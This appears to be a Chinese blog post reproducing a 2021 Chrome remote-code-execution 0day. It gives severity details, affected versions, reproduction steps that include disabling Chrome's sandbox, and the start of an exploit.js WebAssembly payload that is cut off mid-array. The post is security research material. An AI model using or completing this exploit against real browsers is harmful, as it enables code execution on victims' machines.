【复现】windows Chrome 0day漏洞

参考链接:
https://www.pwnwiki.org/index.php?title=Windows_Chrome_0day%E6%BC%8F%E6%B4%9E

http://pub-shbt.s3.360.cn/cert-public-file/%E3%80%90360CERT%E3%80%91%E3%80%90POC%E5%85%AC%E5%BC%80%E3%80%91Chrome_%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C0Day%E6%BC%8F%E6%B4%9E%E9%80%9A%E5%91%8A.pdf

【复现】windows Chrome 0day漏洞

0x01漏洞描述

Chrome远程代码执行0day漏洞
漏洞等级:严重
漏洞评分:9.8

Google Chrome是由Google开发的免费网页浏览器。Chrome相应的开放源代码计划名为Chromium,而Google Chrome本身是非自由软件,未开放全部源代码。
目前Google只针对该漏洞发布了beta测试版Chrome(90.0.4430.70)修复,Chrome正式版( 89.0.4389.114)仍存在漏洞

0x02漏洞详情

Chrome远程代码执行漏洞
组件:Chrome
漏洞类型:命令执行
影响:服务器接管
简述:攻击者利用此漏洞,可以构造一个恶意的web页面,当用户访问该页面时,会造成远程漏洞代码执行。

0x03漏洞复现

1.首先关闭Chrome浏览器的沙盒模式

在这里插入图片描述

2.再次打开浏览器,发现出现-no-sandbox,

在这里插入图片描述

3.代码程序

exploit.html

<script src="exploit.js"></script>

exploit.js

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

南岸青栀*

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值